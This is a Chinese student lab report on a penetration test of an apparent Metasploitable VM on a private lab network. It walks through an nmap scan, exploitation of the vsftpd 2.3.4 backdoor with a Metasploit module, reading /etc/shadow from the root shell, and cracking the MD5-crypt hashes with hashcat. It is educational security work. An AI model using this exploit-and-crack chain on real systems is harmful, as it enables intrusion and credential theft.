[网安实践III] 实验1.渗透测试实验

1 你的攻击机IP和靶机IP

  • 攻击机IP: 192.168.91.131/24
  • 靶机IP: 192.168.91.128/24

2 同组同学的姓名,同组同学的靶机msfadmin的密码,root的密码

  • msfadmin密码: fire1234
  • root密码: miss2345

3 你是如何发现漏洞的?请写出发现漏洞的过程

  1. 使用 msf 中的 nmap 进行端口扫描.
$ sudo msfconsole
msf5 > nmap -sS 192.168.91.0/24 -p 1-10000

如下图, nmap 扫描出IP为 192.168.91.128 的主机有大量开放的端口, 此IP经核实也确实是攻击的目标靶机IP.
具体来看, 目标靶机开放了 ftp, ssh, telnet, mysql 等一系列端口
[网安实践III] 实验1.渗透测试实验_第1张图片
由于目标靶机开放着ftp的21端口, 因此考虑其是否存在 VSFTPD 源码包后门漏洞. 通过 Nmap 的 ftp-vsftpd-backdoor 脚本来进行扫描探测, 使用如下命令, 执行结果如下图所示, 可以看到存在该漏洞, 并且可以进行漏洞利用.

msf5> nmap -script ftp-vsftpd-backdoor -p 21 192.168.91.128

[网安实践III] 实验1.渗透测试实验_第2张图片

4 攻击利用的漏洞,以及攻击的过程。(写到如何获得shadow文件即可)

  1. 在msf中查找和 vsftpd 有关的漏洞利用模块
msf5> search vsftpd

[网安实践III] 实验1.渗透测试实验_第3张图片
2. 选用模块, 并设置选项中的 RHOSTS 为目标靶机的IP

msf5> use exploit/unix/ftp/vsftpd_234_backdoor
msf5> set rhost 192.168.91.128

[网安实践III] 实验1.渗透测试实验_第4张图片
3. 进行漏洞利用, 并成功得到了目标靶机的shell

msf5> exploit

[网安实践III] 实验1.渗透测试实验_第5张图片
4. 使用 ip addr 命令查看当前shell所属的主机IP, 可以看到为靶机的IP; 使用 id 命令查询可以看到当前 shell 已是 root 权限
[网安实践III] 实验1.渗透测试实验_第6张图片
5. 使用 cat 命令即可列出靶机 shadow 文件中的内容

$ cat /etc/shadow

5 获得靶机的shadow文件中msfadmin账号和root账号的内容

如下图, 为靶机 shadow 文件的内容.
[网安实践III] 实验1.渗透测试实验_第7张图片
可以看到, msfadmin账号的内容为 msfadmin:$1$nWDuW2uH$uFxlvdS8JbjduZj7t5hQo/:18758:0:99999:7:::, root账号的内容为 root:$1$NeJ8RrE6$evRQK4nzgt2YAbGdYtJwS1:18758:0:99999:7:::

6 靶机的msfadmin用户的密码,以及破解过程

msfadmin密码

fire1234

破解过程

  1. msfadmin账号内容为: $1$nWDuW2uH$uFxlvdS8JbjduZj7t5hQo/:18758:0:99999:7:::, 由第一部分的值为 1 可以确定加密算法为 md5, 由第二部分可以确定加密的盐值为 nWDuW2uH, 加密后的密文为 nWDuW2uH$uFxlvdS8JbjduZj7t5hQo/
  2. 使用 hashcat 工具进行破解. 通过对密码的已知信息, 使用如下命令进行暴力破解
$ hashcat -m 500 -a 3 ./msfadmin.txt ?l?l?l?l?d?d?d?d --force

其中 -m 500 表示对 md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) 类型的哈希值进行破解; -a 3 表示为暴力破解; ./msfadmin.txt 中的内容即为 $1$nWDuW2uH$uFxlvdS8JbjduZj7t5hQo/; 而 ?l?l?l?l?d?d?d?d 表示密码的掩码, 为前4位是小写字母, 后4位为数字; --force为强制进行破解.
3. 进过一定时间的破解, 得到最终的结果为 fire1234.
[网安实践III] 实验1.渗透测试实验_第8张图片

7 靶机的root密码,以及破解过程

root密码

miss2345

破解过程

破解过程同对账户 msfadmin 的破解过程, 使用 hashcat 进行密码破解, 在此不多赘述.
使用命令:

hashcat -m 500 -a 3 ./root.txt ?l?l?l?l?d?d?d?d  --force

由于破解时间较长, 又询问队友得到一定提示, 最终进过一定时间的破解, 得到结果为 miss2345.
[网安实践III] 实验1.渗透测试实验_第9张图片

你可能感兴趣的:(网安实践III,系统安全,安全)